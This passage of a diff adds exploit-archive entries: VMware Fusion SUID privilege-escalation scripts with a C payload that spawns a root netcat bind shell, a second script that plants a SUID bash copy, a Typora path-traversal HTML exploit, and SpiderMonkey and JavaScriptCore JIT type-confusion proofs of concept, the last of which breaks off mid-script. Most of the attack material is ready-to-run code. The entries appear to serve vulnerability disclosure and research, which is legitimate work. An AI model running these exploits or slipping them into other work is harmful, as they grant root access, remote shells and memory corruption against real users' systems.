+   will remain running until manually stopped via CTRL-c. The exploit will start
+   a netcat listener as root on TCP port 3333.
+3) Connect to the netcat listener: nc 127.0.0.1 3333
+
+Details:
+This vulnerability is a directory traversal bug inside of VMware Fusion. Several
+of the programs included in VMware Fusion rely on the their path on disk to find
+other libraries, helper utilities, and service daemons. Two such instances of
+this code pattern in SUID programs can be found in the "Open VMware Fusion
+Services" executable and the "Open VMware USB Arbitrator Service" executable.
+These programs try to open the service programs by looking for the files:
+
+Open VMware Fusion Services:
+$DIRECTORY_WITH_SUID_EXECUTABLE/../../../Contents/Library/services/VMware Fusion Services
+Open VMware USB Arbitrator Service:
+$DIRECTORY_WITH_SUID_EXECUTABLE/../../../Contents/Library/services/VMware USB Arbitrator Service
+
+While ordinarily this is fine, as any attempt to copy the programs will not copy
+the SUID ownership of the file and any attempt to the move the programs will
+fail without root access. Furthermore symbolic links will not trick the programs
+into using the new location. However, on macOS unprivileged users can create
+hard links to SUID executables, which will trick the programs. Thus, by creating
+an adequate directory layout and hard linking to the SUID programs, we can trick
+them into running an executable of our choice as the root user. The included
+exploit_usb.sh and exploit_fusion.sh scripts setup the correct directory
+structure and hard link, compile the payload, and run the linked program in
+order to start a netcat listener as root on TCP port 3333.
+
+In addition to the two SUID executables listed above, the SUID executable
+"vmware-authd" is also vulnerable to this bug. vmware-authd tries to load two
+libraries, libcrypto and libssl, from the incorrect directory. However, the two
+libraries must be signed by apple or with an apple distributed signing
+certificate from an organization containing the word "VMware". As such, this bug
+is harder to exploit in vmware-authd. Depending on how strict Apple's developer
+verification process is, it may be possible to fool Apple into granting a
+matching certificate by hiding VMware within a phrase, such as with a
+certificate for "Never Mind Where cloud services inc (NVMware Inc)".
+
+One limitation to this vulnerability is that these two vulnerable service
+openers will not try to open their services if the service is already running.
+Thus, the exploit will not work if the "VMware USB Arbitrator Service" and
+"VMware Fusion Services" services are already running. Thus, if the VMware
+Fusion GUI is open, this vulnerability cannot be exploited. However, closing the
+GUI will stop the services associated with the vulnerable service openers and
+make the vulnerability once again exploitable. In contrast, the library
+injection attack is not subject to these restrictions (but requires the
+appropriate certificate).
+
+As a side note, the vulnerable code is also used in VMware Workstation on Linux.
+However, Linux does not allow an unprivileged user to create hard links to files
+they do not own. As such, this bug is not exploitable in VMware Workstation on
+Linux.
+
+Timeline:
+2019.11.12 Reported to VMware
+2019.12.18 VMware confirms they can reproduce the issue
+2019.12.24 Asked for status update, were told we'd get an update in early Jan
+2020.01.08 Requested status update, were told fix scheduled for April 2020
+2020.01.15 Called VMware to discuss
+2020.01.21 Follow up meeting with VMware to discuss
+2020.03.17 VMware releases patch & public disclosure
+
+
+
+
+
+
+
+
+
+
+
+
+
+## exploit_fusion.sh
+```
+#!/bin/sh
+
+# Remake the necessary folder structure
+rm -rf a Contents
+mkdir -p Contents/Library/services/
+mkdir -p a/b/c/
+
+# Build our payload
+clang payload.c -o "Contents/Library/services/VMware Fusion Services"
+
+# Create a hard link to the VMware SUID opener program
+ln /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services a/b/c/linked
+
+# Run the linked program, which causes it to be confused about the path, and
+# launch our payload.  Additionally if our payload exits, VMware will relaunch
+# it
+a/b/c/linked
+```
+## exploit_fusion.sh EOF
+
+
+## exploit_usb.sh
+```
+#!/bin/sh
+
+# Remake the necessary folder structure
+rm -rf a Contents
+mkdir -p Contents/Library/services/
+mkdir -p a/b/c/
+
+# Build our payload
+clang payload.c -o "Contents/Library/services/VMware USB Arbitrator Service"
+
+# Create a hard link to the VMware SUID opener program
+ln /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ USB\ Arbitrator\ Service a/b/c/linked
+
+# Run the linked program, which causes it to be confused about the path, and
+# launch our payload.  Additionally if our payload exits, VMware will relaunch
+# it
+a/b/c/linked
+```
+## exploit_usb.sh EOF
+
+
+## payload.c
+```
+#include <stdlib.h>
+#include <unistd.h>
+int main(int argc, char**argv) {
+	setuid(0);
+	system("rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 3333 > /tmp/f");
+	return 0;
+}
+```
+## payload.c EOF
\ No newline at end of file
diff --git a/exploits/macos/local/48235.sh b/exploits/macos/local/48235.sh
new file mode 100755
index 000000000..c6a0f7f73
--- /dev/null
+++ b/exploits/macos/local/48235.sh
@@ -0,0 +1,43 @@
+# Exploit Title: VMware Fusion 11.5.2 - Privilege Escalation
+# Date: 2020-03-17
+# Exploit Author: Rich Mirch
+# Vendor Homepage: https://www.vmware.com/products/fusion.html
+# Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2020-0005.html
+# Software Link: https://download3.vmware.com/software/fusion/file/VMware-Fusion-11.5.1-15018442.dmg
+# Versions:
+# VMware Fusion Professional 11.5.1 (15018442)
+# VMware Fusion Professional 11.5.2 (15794494)
+#
+# Tested on: macOS 10.14.6
+# CVE : CVE-2020-3950
+# Source PoC: https://raw.githubusercontent.com/mirchr/security-research/master/vulnerabilities/CVE-2020-3950.sh
+#
+#
+#!/bin/bash
+echo "CVE-2020-3950 VMware Fusion EoP PoC by @0xm1rch"
+
+mkdir -p ~/a/b/c
+mkdir -p ~/Contents/Library/services
+
+cat > ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service <<EOF
+#!/usr/bin/python
+import os
+os.setuid(0)
+os.system("cp /bin/bash $HOME/.woot;chmod 4755 $HOME/.woot");
+EOF
+
+chmod 755 ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service
+
+cd ~/a/b/c
+ln "/Applications/VMware Fusion.app/Contents/Library/services/Open VMware USB Arbitrator Service" . 2>/dev/null
+"${PWD}/Open VMware USB Arbitrator Service" >/dev/null 2>/dev/null &
+p=$!
+echo "Sleeping for 5 seconds"
+sleep 5
+kill ${p?}
+wait
+
+echo "Sleeping for 7 seconds"
+sleep 7
+
+$HOME/.woot -p
\ No newline at end of file
diff --git a/exploits/macos/remote/46932.txt b/exploits/macos/remote/46932.txt
new file mode 100644
index 000000000..2c398a64e
--- /dev/null
+++ b/exploits/macos/remote/46932.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Code execution via path traversal
+# Date: 17-05-2019
+# Exploit Author: Dhiraj Mishra
+# Vendor Homepage: http://typora.io
+# Software Link: https://typora.io/download/Typora.dmg
+# Version: 0.9.9.24.6
+# Tested on: macOS Mojave v10.14.4
+# CVE: CVE-2019-12137
+# References:
+# https://nvd.nist.gov/vuln/detail/CVE-2019-12137
+# https://github.com/typora/typora-issues/issues/2505
+
+Summary:
+Typora 0.9.9.24.6 on macOS allows directory traversal, for the execution of
+arbitrary programs, via a file:/// or ../ substring in a shared note via
+abusing URI schemes.
+
+Technical observation:
+A crafted URI can be used in a note to perform this attack using file:///
+has an argument or by traversing to any directory like
+(../../../../something.app).
+
+Since, Typro also has a feature of sharing notes, in such case attacker
+could leverage this vulnerability and send crafted notes to the
+victim to perform any further attack.
+
+Simple exploit code would be:
+
+<body>
+<a href="file:\\\Applications\Calculator.app" id=inputzero>
+  <img src="someimage.jpeg" alt="inputzero" width="104" height="142">
+</a>
+<script>
+(function download() {
+    document.getElementById('inputzero').click();
+})()
+</script>
+</body>
+
+
+
+
+And alt would be:
+
+```
+[Hello World](file:///../../../../etc/passwd)
+[Hello World](file:///../../../../something.app)
+```
\ No newline at end of file
diff --git a/exploits/multiple/dos/46646.txt b/exploits/multiple/dos/46646.txt
new file mode 100644
index 000000000..52f5fba4d
--- /dev/null
+++ b/exploits/multiple/dos/46646.txt
@@ -0,0 +1,232 @@
+A bug in IonMonkey leaves type inference information inconsistent, which in turn allows the compilation of JITed functions that cause type confusions between arbitrary objects.
+
+# Prerequisites
+
+In Spidermonkey, every JavaScript objects is an instance of the JSObject class [1]. Plain JavaScript objects (e.g. ones created through an object literal) are typically instances of the NativeObject [2] class. A NativeObject is basically:
+
+* An ObjectGroup [3] which stores things like the prototype and type information for properties (see below)
+* The Shape [4] of the object which indicates the location of properties. A Shape could e.g. tell that property .p is stored in the 2nd property slot
+* Property storage [5]: a dynamically sized array in which the property values are stored. The Shapes provide indices into this array
+* Element storage [6]: a dynamically sized array in which elements (properties with an integer key) are stored
+
+Spidermonky makes use of type inference to perform various optimizations in the JIT. Specifically, type inference is used to predict the types of object properties and then omit runtime type checks for them. Such a type inference system for property values is only safe as long as every property store to an object validates that the type of the new value is consistent with the existing type information or, if not, updates ("widens") the inferred type. In Spidermonkey's interpreter this is done in e.g. AddOrChangeProperty [7]. In the JIT compiler (IonMonkey), this is done through "type barriers" [8]: small runtime type checks that ensure the written value is consistent with what is stored as inferred type and otherwise bail out from the JITed code.
+
+# Crashing Testcase
+
+The following program, found through fuzzing and then manually modified, crashes Spidermonkey with an assertion that verifies that type inference data is consistent with the actual values stored as properties:
+
+    function hax(o, changeProto) {
+        if (changeProto) {
+            o.p = 42;
+            o.__proto__ = {};
+        }
+        o.p = 13.37;
+        return o;
+    }
+
+    for (let i = 0; i < 1000; i++) {
+        hax({}, false);
+    }
+
+    for (let i = 0; i < 10000; i++) {
+        let o = hax({}, true);
+        eval('o.p'); 			// Crash here
+    }
+
+
+Crashes in debug builds of Spidermonkey with:
+
+    Assertion failure: [infer failure] Missing type in object [Object * 0x327f2ca0aca0] p: float, at js/src/vm/TypeInference.cpp:265
+    Hit MOZ_CRASH() at js/src/vm/TypeInference.cpp:266
+
+This assertion expresses that type inference data is inconsistent for the property .p as the type "float" is not in the list of possible types but the property currently holds a float value.
+
+# Bug Analysis
+
+In essence it appears that IonMonkey fails to realize that the ObjectGroup of the object `o` can change throughout the function (specifically during the prototype change) and thus incorrectly omits a type barrier for the second property assignment, leading to inconsistent type inference information after the property assignment.
+
+In detail, the following appears to be happening:
+
+The first loop runs and allocates NativeObjects with ObjectGroup OG1 and Shape S1. After some iterations the function hax is JIT compiled. At that point, the compiled code will expect to be called with an object of ObjectGroup OG1 as input. OG1 will have inferred types {.p: [float]} because the body of the if condition was never executed and so property .p was never set to a non-float value.
+
+Then the second loop starts running, which will allocate objects using a new ObjectGroup, OG2 (I'm not exactly sure why it's a new one here, most likely some kind of heuristic) but still using Shape S1. As such, the compiled code for hax will be invalidated [9]. Then, during the first invocation of hax with changeProto == true, a new prototype will be set for o, which will
+
+1. cause a new ObjectGroup to be allocated for O (because prototypes are stored in the object group) and
+2. cause the previous object group (OG2) to discard any inferred types and set the state of inferred properties to unknown [10]. An ObjectGroup with unknownProperties is then never again used for type inference of properties [11].
+
+At a later point in the loop, the function is recompiled, but this time it is compiled to expect an object of ObjectGroup OG1 or OG2 as input. The JIT compiled code for hax will now look something like this (pseudocode):
+
+    // Verify that the input is an object with ObjectGroup OG1 or OG2 (actually
+    // this check is performed before entering the JITed code)
+    VerifyInputTypes
+
+    if (changeProto) {
+        // A SetProperty [12] inline cache [13] which will perform the actual
+        // property store and speed up subsequent property stores on objects of
+        // the same Shape and Group. Since a type barrier is required, the Group
+        // is used as an additional index into the cache so that both Shape and
+        // Group must match, in which case no inferred types could be
+        // accidentially invalidated.
+        SetPropertyICWithTypeBarrier o.p 42
+
+        Call ChangePrototype(o, {})
+    }
+
+    // Another inline cache to store property .p again, but this time without a
+    // type barrier. As such, only the Shape will be checked and not the Group.
+    SetPropertyIC o.p 13.37
+
+    Return o
+
+After compilation finishes, the following happens in the first invocation of the JITed code:
+
+* The function is called with an object of ObjectGroup OG2 and Shape S1
+* The property .p is stored on the object in the first SetProperty cache. This does not update any inferred type as OG2 does not use inferred types
+* The prototype of o is changed
+    * This again causes a new ObjectGroup, OG3, to be allocated
+    * When creating the new group, property types are inferred from the current object (this is possible because it is the only object using the new group) [14]
+    * As such, o now has an ObjectGroup OG3 with inferred types {.p: [int]}
+* The second propertystore cache runs into a cache miss (because it is empty at this point)
+    * Execution transfers to the slow path (a runtime property store)
+    * This will store the property and update the inferred types of OG3 to {.p: [int, float]}
+    * It will then update the inline cache to now directly handle property stores to objects with shape S1
+    * Because this SetPropertyIC is not marked as requiring a type barrier, the cache only guards on the Shape, not the Group [15]
+
+Then, in the second invocation of the JITed code:
+
+* As above, a new ObjectGroup OG4 is allocated for o with inferred types {.p: [int]} when changing the prototype
+* The second SetPropertyIC now runs into a cache hit (because it only looks at the Shape which is still S1)
+* It then directly writes the property value into the property slot without updating inferred types
+
+As such, after the second invocation the returned object is one whose ObjectGroup (OG4) states that the property .p must be an integer but it really is a float. At this time, any validation of inferred types will crash with an assertion as happens during the runtime property lookup of .p in the call to eval().
+
+The core issue here is that the second property store was marked as not requiring a type barrier. To understand why, it is necessary to look into the logic determining whether a property write should be guarded with a type barrier, implemented in jit::PropertyWriteNeedsTypeBarrier [16]. The logic of that function is roughly:
+
+1. Iterate over the set of possible object types, in this case that is OG1 and OG2
+2. For every group, check whether storing a value of type T (in this case float) would violate inferred property types
+	- In this case, OG1 already has the correct type for property .p, so no violation there
+	- And OG2 does not even track property types, so again no violation [17]
+3. If no violations were found, no type barrier is needed
+
+The problem is that PropertyWriteNeedsTypeBarrier operates on the possible ObjectGroups of the input object at the beginning of the function which are not necessarily the same as at the time the property store is performed. As such, it fails to realize that the input object can actually have an ObjectGroup (in this case OG4) that has inferred property types that would be violated by the property write. It then falsely determine that a type barrier is not needed, leading to the scenario described above.
+
+# Exploitation
+
+Exploitation of this type of vulnerability comes down to JIT compiling a function in such a way that the compiler makes use of type inference data to omit runtime type checks. Afterwards a type confusion between arbitrary objects can be achieved.
+
+The following code demonstrates this by setting the inferred type to Uint8Array but actually storing an object with controlled property values (overlapping with internal fields of a Uint8Array) in the property. It then compiles code (the function pwn) to omit type checks on the property value based on its inferred types, thus treating the custom object as a Uint8Array and crashing when reading from 0x414141414141:
+
+    let ab = new ArrayBuffer(1024);
+
+    function hax(o, changeProto) {
+        // The argument type for |o| will be object of group OG1 or OG2. OG1 will
+        // have the inferred types {.p: [Y]}. OG2 on the other hand will be an
+        // ObjectGroup with unknown property types due to the prototype change. As
+        // such, OG2 will never have any inferred property types.
+
+        // Ultimately, this code will confuse types X and Y with each other.
+        // Type X: a Uint8Array
+        let x = new Uint8Array(1024);
+        // Type Y: a unboxed object looking a bit like a Uint8Array but with controlled data... :)
+        let y = {slots: 13.37, elements: 13.38, buffer: ab, length: 13.39, byteOffset: 13.40, data: 3.54484805889626e-310};
+
+        if (changeProto) {
+            o.p = x;
+
+            // This prototype change will cause a new ObjectGroup, OG_N, to be
+            // allocated for o every time it is executed (because the prototype is
+            // stored in the ObjectGroup). During creation of the new ObjectGroup,
+            // the current property values will be used to infer property types. As
+            // such, OG_N will have the inferred types {.p: [X]}.
+            o.__proto__ = {};
+        }
+
+        // This property write was not marked as requiring type barriers to
+        // validate the consistency of inferred property types. The reason is that
+        // for OG1, the property type is already correct and OG2 does not track
+        // property types at all. However, IonMonkey failed to realize that the
+        // ObjectGroup of o could have changed in between to a new ObjectGroup that
+        // has different inferred property types. As such, the type barrier
+        // omission here is unsafe.
+        //
+        // In the second invocation, the inline cache for this property store will
+        // then be a hit (because the IC only uses the Shape to index the cache,
+        // not the Group). As such, the inferred types associated with the
+        // ObjectGroup for o will not be updated and will be left inconsistent.
+        o.p = y;
+
+        return o;
+    }
+
+    function pwn(o, trigger) {
+        if (trigger) {
+            // Is on a code path that wasn't executed in the interpreter so that
+            // IonMonkey solely relies on type inference instead of type profiles
+            // from the interpreter (which would show the real type).
+            return o.p[0];
+        } else {
+            return 42;
+        }
+    }
+
+    // "Teach" the function hax that it should accept objects with ObjectGroup OG1.
+    // This is required as IonMonkey needs to have at least one "known" type when
+    // determining whether it can omit type barriers for property writes:
+    // https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6282
+    for (let i = 0; i < 10000; i++) {
+        hax({}, false);
+    }
+
+    // Compile hax to trigger the bug in such a way that an object will be created
+    // whose ObjectGroup indicates type X for property .p but whose real type will
+    // be Y, where both X and Y can be arbitrarily chosen.
+    let evilObj;
+    for (let i = 0; i < 10000; i++) {
+        evilObj = hax({}, true);
+
+        // Not sure why this is required here, it maybe prevents JITing of the main
+        // script or similar...
+        eval('evilObj.p');
+    }
+
+    // JIT compile the second function and make it rely on the (incorrect) type
+    // inference data to omit runtime type checks.
+    for (let i = 0; i < 100000; i++) {
+        pwn(evilObj, false);
+    }
+
+    // Finally trigger a type confusion.
+    pwn(evilObj, true);
+
+Note, this way of exploiting the issue requires UnboxedObjects [18] which have recently been disabled by default [19]. However, the bug itself does not require UnboxedObjects and can be exploited in other ways. UnboxedObjects are just the most (?) convenient way.
+
+[1] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/JSObject.h#L54
+[2] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L463
+[3] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/ObjectGroup.h#L87
+[4] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/Shape.h#L37
+[5] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L466
+[6] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L469
+[7] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.cpp#L1448
+[8] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.h#L10254
+[9] https://blog.mozilla.org/javascript/2012/10/15/the-ins-and-outs-of-invalidation/
+[10] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/JSObject.cpp#L2219
+[11] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/TypeInference.cpp#L2946
+[12] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/IonIC.h#L280
+[13] https://www.mgaudet.ca/technical/2018/6/5/an-inline-cache-isnt-just-a-cache
+[14] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.cpp#L1259
+[15] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/CacheIR.cpp#L3544
+[16] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6268
+[17] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6293
+[18] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/UnboxedObject.h#L187
+[19] https://github.com/mozilla/gecko-dev/commit/26965039e60a00b3600ce2e6a559106e4a3a30ca
+
+ Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=1538120
+
+
+ Fixed in https://www.mozilla.org/en-US/security/advisories/mfsa2019-09/#CVE-2019-9813 (bug collision with a pwn2own entry)
+
+The issue was fixed in two ways:
+
+1. in https://github.com/mozilla/gecko-dev/commit/0ff528029590e051baa60265b3af92a632a7e850 the code that adds inferred properties after a prototype change (step `* When creating the new group, property types are inferred from the current object` above) was changed to no longer create inferred property types when coming from Groups marked as having unknownProperties. As such, in this case the new ObjectGroups created from OG2 would now all have unknownProperties as well.
+
+2. in https://github.com/mozilla/gecko-dev/commit/f8ce40d176067800e5dda013fb4d8ff9e91d9a88 the function responsible for determining whether write barriers can be omitted (jit::PropertyWriteNeedsTypeBarrier) was modified to always emit write barriers if one of the input groups has unknownProperties.
\ No newline at end of file
diff --git a/exploits/multiple/dos/46647.js b/exploits/multiple/dos/46647.js
new file mode 100644
index 000000000..9da6a7658
--- /dev/null
+++ b/exploits/multiple/dos/46647.js
@@ -0,0 +1,201 @@
+/*
+Prerequisites
+-------------
+
+In JavaScriptCore, JSObjects have an associated Structure: an object describing various aspects of the JSObject such as its type, its properties, and the type of elements being stored (e.g. unboxed double or JSValues). Whenever a property is added to an object (or some other aspect of it is changed), a new structure is allocated which now also contains the new property. This "structure transition" is then cached so that the same structure can be reused for similar transitions in the future.
+
+Arrays in JavaScriptCore can have different indexing modes: the contiguous modes (ArrayWithInt32, ArrayWithDouble, ArrayWithContiguous), and modes used for sparse arrays (ArrayWitArrayStorage, ArrayWithSlowPutArrayStorage). JavaScriptCore has a notion of "having a bad time" (JSGlobalObject::haveABadTime). This is the case when an object in the array prototype chain has indexed accessors. In that case, the indexing mode of all arrays is switched to ArrayWithSlowPutStorage, which indicates that element stores to holes have to consult the prototype chain. The engine will "have a bad time" as soon as an object in the default prototype chain of Arrays has an indexed accessor.
+
+JavaScriptCore can track types of properties using the inferred type mechanism. Essentially, the first time a property is created, an inferred type for the property is installed and linked to the structure. The inferred type is based on the initial value of the property. For example: setting a property .x for the first time with a value of 42 would initialize the inferred type for .x to be "Int32". If the same property (on any Object referencing it) is assigned a new value, the inferred type for that property is "widened" to include all previous types and the new type. For example: if later on a double value is stored in property .x, the new inferred type for that property would be "Number". See InferredType::Descriptor::merge for the exact rules. Besides primitive types and "Object", inferred types can also be "ObjectWithStructure", in which case the property is known to be an object with a specific structure. The DFG and FTL JIT compilers make use of inferred types to omit type checks. Consider the following code:
+
+    function foo(o) {
+        return o.a.b;
+    }
+
+Assuming that the inferred type for the .a property is ObjectWithStructure, then the compiler is able to use the inferred type to omit the StructureCheck for o.a and will thus only emit a single StructureCheck for o.
+
+
+Vulnerability Details
+---------------------
+
+The inferred type mechanism is secured via watchpoints: whenever a piece of JIT code relies on inferred types, it installs a callback (called Watchpoint) on the inferred type to trigger whenever it is widened. In that case the JIT code is discarded as it is no longer safe to execute. Code that updates a property value is then required to check whether the inferred type is still consistent with the new value and if not widen it and trigger Watchpoints. This is done e.g. in Structure::willStoreValueForExistingTransition. As such, every "direct" property store, one that does not update inferred types, could now be a security bug as it could violate inferred types. JSObject::putDirect is such an example:
+
+    void putDirect(VM& vm, PropertyOffset offset, JSValue value) { locationForOffset(offset)->set(vm, this, value); }
+
+The function directly stores the provided value to the given property slot without accounting for inferred types, which the caller is supposed to do. Looking for cross references to said function leads to createRegExpMatchesArray (used e.g. for %String.prototype.match) which in essence does:
+
+    let array = newArrayWithStructure(regExpMatchesArrayWithGroupsStructure);
+    array->putDirect(vm, RegExpMatchesArrayIndexPropertyOffset, index)
+    array->putDirect(vm, RegExpMatchesArrayInputPropertyOffset, input)
+    array->putDirect(vm, RegExpMatchesArrayGroupsPropertyOffset, groups)
+
+As such, if it was possible to get the engine to set an inferred type for one of the three properties of the regExpMatchesArrayWithGroupsStructure structure, one could then invalidate the inferred type through %String.prototype.match without firing watchpoints. The regExpMatchesArrayWithGroupsStructure is created during initialization of the engine by following this pseudo code:
+
+    let structure = arrayStructureForIndexingTypeDuringAllocation(ArrayWithContiguous);
+    structure = Structure::addPropertyTransition(vm, structure, "index");
+    structure = Structure::addPropertyTransition(vm, structure, "input");
+    regExpMatchesArrayWithGroupsStructure = Structure::addPropertyTransition(vm, structure, "groups");
+
+It is thus possible to manually construct an object having the regExpMatchesArrayWithGroupsStructure as structure like this:
+
+    var a = ["a", "b", "c"];            // ArrayWithContiguous
+    a.index = 42;
+    a.input = "foo";
+    a.groups = null;
+
+Unfortunately, as the regExpMatchesArrayWithGroupsStructure is created at initialization time of the engine, no inferred type will be set for any of the properties as no property value is available for the initial structure transition.
+
+However, regExpMatchesArrayWithGroupsStructure is re-created when the engine is having a bad time. In that case, all arrays will now use ArrayWithSlowPutArrayStorage mode. For that reason, a new structure for regExpMatchesArrayWithGroupsStructure is created as well which now uses ArrayWithSlowPutArrayStorage instead of ArrayWithContiguous as base structure. As such, if somehow it was possible to create the resulting regExpMatchesArrayWithGroupsStructure before the engine has a bad time, then inferred types could be installed on said structure. It is rather tricky to construct an array that has the default array prototype and uses ArrayWithSlowPutArrayStorage mode, as that mode is only used when a prototype has indexed accessors. However, it is possible using the following code:
+
+    // Create a plain array with indexing type SlowPutArrayStorage. This is equivalent to
+    // `arrayStructureForIndexingTypeDuringAllocation(ArrayWithSlowPutArrayStorage)` in C++.
+    function createArrayWithSlowPutArrayStorage() {
+        let protoWithIndexedAccessors = {};
+        Object.defineProperty(protoWithIndexedAccessors, 1337, { get() { return 1337; } });
+
+        // Compile a function that will end up creating an array with SlowPutArrayStorage.
+        function helper(i) {
+            // After JIT compilation, this new Array call will construct a normal array (with the
+            // original Array prototype) with SlowPutArrayStorage due to profiling information from
+            // previous executions (which all ended up transitioning to SlowPutArrayStorage).
+            let a = new Array;
+            if (i > 0) {
+                // Convert the array to SlowPutArrayStorage by installing a prototype with indexed
+                // accessors. We can't directly use this object though as the prototype is different and
+                // thus the structure has changed.
+                Object.setPrototypeOf(a, protoWithIndexedAccessors);
+            }
+            return a;
+        }
+
+        for (let i = 1; i < 10000; i++) {
+            helper(i);
+        }
+
+        return helper(0);
+    }
+
+Once the helper function is JIT compiled, the profile information for the "new Array" operation will indicate that the resulting array will eventually use the ArrayWithSlowPutArrayStorage indexing mode. As such, the engine decides to directly allocate the object with ArrayWithSlowPutArrayStorage during `new Array` in the JIT code. By not going into the if branch it is possible to construct an array with SlowPutArrayStorage that never changed its prototype from the original array prototype (which causes a structure transition and as such cannot be used).
+
+From here, it is possible to create the same structure that will later become regExpMatchesArrayWithGroupsStructure after having a bad time:
+
+    let a = createArrayWithSlowPutArrayStorage();
+    a.index = 1337;
+    a.input = "foobar"
+    a.groups = obj;
+
+However, this time the engine will use inferred types for all properties since this is the first time the structure is created and all properties are initialized with values. With that, it is now possible to compile a function that uses these inferred types to omit type checks, such as:
+
+    // Install a global property with inferred type of ObjectWithStructure.
+    global = a;
+    // Must assign twice, otherwise JIT assumes 'global' is a constant.
+    global = a;
+
+    function hax() {
+        return global.groups.someProperty;
+    }
+
+This function will be compiled without any StructureCheck operations to perform runtime type checks as everything is based on inferred types.
+
+Next, String.match is invoked to produce an object with the same structure but which now violates the inferred type due to createRegExpMatchesArray using putDirect for the property store. The resulting object can safely be assigned to the 'global' variable as it has the same structure as before. Afterwards, the compiled function can be invoked again to cause a type confusion when accessing .someProperty because the .groups property now has a different Structure than indicated by its inferred type.
+
+To recap, the steps to achieve a type confusion between an object of type TX and an object of type TY, where both TX and TY can be arbitrarily chosen, are as follows:
+
+1. Let X and Y be two objects with structures S1 and S2 respectively (corresponding to type TX and type TY).
+2. Let O be an object with an out-of-line property whose value is X and inferred type thus TX. O will have structure S3.
+3. Create an array with unmodified prototype chain and SlowPutArrayStorage as described above. It will have structure S4 (plain array with SlowPutStorage).
+4. Add properties 'index', 'input', and 'groups' in that order to create structures S5, S6, and S7. Set the initial value of the 'groups' property to O so its inferred type will be ObjectWithStructure S3.
+5. Have a bad time: install an indexed accessor on the array prototype. This will cause arrays to be converted and regExpMatchesArrayWithGroupsStructure to be recreated. However, since the structure transitions already exist, regExpMatchesArrayWithGroupsStructure will become structure S7. The inferred types for S7 will not change since no property values are assigned.
+6. JIT compile a function that relies on the inferred type of the .groups property of structure S7 which is ObjectWithStructure S3.
+7. Call String.prototype.match to create an object M with structure S8, which, however, violates the inferred types as createRegExpMatchesArray uses putDirect.
+8. Set the first out-of-line property of M.groups to Y.
+9. Call the JIT compiled function with M. As M has structure S7, the code will not bail out, then access the first out-of-line property of M.groups believing it to be type TX while it really is type TY now.
+
+The attached PoC uses this to confuse an object with a double inline property with an object with a pointer inline property.
+*/
+
+// /System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc poc.js
+// The PoC will confuse objX with objY.
+// objX will have structure S1, objY structure S2.
+let objX = {objProperty: {fetchme: 1234}};
+let objY = {doubleProperty: 2130562.5098039214};             // 0x4141414141414141 in memory
+
+// Create a plain array with indexing type SlowPutArrayStorage. This is equivalent to
+// `arrayStructureForIndexingTypeDuringAllocation(ArrayWithSlowPutArrayStorage)` in C++.
+function createArrayWithSlowPutArrayStorage() {
+    let protoWithIndexedAccessors = {};
+    Object.defineProperty(protoWithIndexedAccessors, 1337, { get() { return 1337; } });
+
+    // Compile a function that will end up creating an array with SlowPutArrayStorage.
+    function helper(i) {
+        // After JIT compilation, this new Array call will construct a normal array (with the
+        // original Array prototype) with SlowPutArrayStorage due to profiling information from
+        // previous executions (which all ended up transitioning to SlowPutArrayStorage).
+        let a = new Array;
+        if (i > 0) {
+            // Convert the array to SlowPutArrayStorage by installing a prototype with indexed
+            // accessors. This object can, however, not be used directly as the prototype is
+            // different and thus the structure has changed.
+            Object.setPrototypeOf(a, protoWithIndexedAccessors);
+        }
+        return a;
+    }
+
+    for (let i = 1; i < 10000; i++) {
+        helper(i);
+    }
+
+    return helper(0);
+}
+
+// Helper object using inferred types.
+let obj = {};
+obj.inlineProperty1 = 1337;
+obj.inlineProperty2 = 1338;
+obj.oolProperty1 = objX;        // Inferred type of 'oolProperty1' will be ObjectWithStructure S1.
+// 'obj' now has structure S3.
+
+// Create the same structure (S4) that will later (when having a bad time) be used as
+// regExpMatchesArrayWithGroupsStructure. Since property values are assigned during the initial
+// structure transition, inferred types for all property values are created.
+let a = createArrayWithSlowPutArrayStorage();       // a has Structure S4,
+a.index = 42;                                       // S5,
+a.input = "foobar";                                 // S6,
+a.groups = obj;                                     // and S7.
